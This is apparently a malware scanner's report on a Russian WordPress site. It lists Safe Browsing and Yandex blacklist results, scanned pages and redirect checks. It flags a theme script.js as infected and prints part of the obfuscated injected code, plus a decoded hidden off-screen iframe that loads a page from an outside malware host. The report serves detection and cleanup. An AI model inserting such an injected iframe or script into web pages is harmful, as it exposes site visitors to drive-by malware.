Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=1wmrbux.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://1wmrbux.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://1wmrbux.ru/ | 200 OK Content-Length: 35121 Content-Type: text/html | clean |
http://1wmrbux.ru/wp-content/themes/cellular-phone-theme_2/script.js | 200 OK Content-Length: 10369 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; }
function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre artEventHelper.bind(button, 'mouseup', function(e) { e = e || window.event; button = e.target || e.srcElement; wrapper = button.parentNode; if (!artHasClass(button, 'active')) wrapper.className = wrapper.className.replace(/active/, ""); }); } } }
artLoadEvent.add(function() { artButtonsSetupJsHover("art-button"); });
artLoadEvent.add(function() { artButtonsSetupJsHover("button"); });
Decoded script:
function () { try { document.documentElement.doScroll("left"); } catch (e) { setTimeout(arguments.callee, 10); return; } ready(); }
/*** called setTimeout with function () { try { document.documentElement.doScroll("left"); } catch (e) { setTimeout(arguments.callee, 10); return; } ready(); }, 10 */
function () { if (done) { return; } done = true; for (var i = 0; i < list.length; i++) { list[i](); } }
<iframe src="http://Internet.sololineas.com/dfgatrsjygfhsrtjs12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe>
Antivirus reports:
http://1wmrbux.ru/kak-vybirat-avtomobil/ | 200 OK Content-Length: 16803 Content-Type: text/html | clean |
http://1wmrbux.ru/opisanie-i-xarakteristiki-modeli-noutbuka-macbook-pro-mc975/ | 200 OK Content-Length: 18279 Content-Type: text/html | clean |
http://1wmrbux.ru/shirokimi-vozmozhnostyami/ | 200 OK Content-Length: 16370 Content-Type: text/html | clean |
http://1wmrbux.ru/ostalos-nam-razobrat/ | 200 OK Content-Length: 15353 Content-Type: text/html | clean |
http://1wmrbux.ru/prilozhennoe-napryazhenie/ | 200 OK Content-Length: 15101 Content-Type: text/html | clean |
http://1wmrbux.ru/posle-otkrytiya-tranzistora/ | 200 OK Content-Length: 16053 Content-Type: text/html | clean |
http://1wmrbux.ru/rezistor-r1/ | 200 OK Content-Length: 16209 Content-Type: text/html | clean |
http://1wmrbux.ru/vtoraya-sxema-imitiruet-preryvistyj-gudok/ | 200 OK Content-Length: 16608 Content-Type: text/html | clean |
http://1wmrbux.ru/cel-opytov/ | 200 OK Content-Length: 15718 Content-Type: text/html | clean |
http://1wmrbux.ru/impuls-na-vyxode/ | 200 OK Content-Length: 16712 Content-Type: text/html | clean |
http://1wmrbux.ru/nagruzochnuyu-sposobnost/ | 200 OK Content-Length: 15795 Content-Type: text/html | clean |
http://1wmrbux.ru/logicheskij-uroven/ | 200 OK Content-Length: 16904 Content-Type: text/html | clean |
http://1wmrbux.ru/pri-otsutstvii-vneshnego-elektricheskogo-polya/ | 200 OK Content-Length: 17224 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 1wmrbux.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 11:12:21 GMT
Server: nginx/1.4.3
Content-Type: text/html; charset=UTF-8
X-Pingback: http://1wmrbux.ru/xmlrpc.php
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: 1wmrbux.ru
Referer: http://www.google.com/search?q=1wmrbux.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.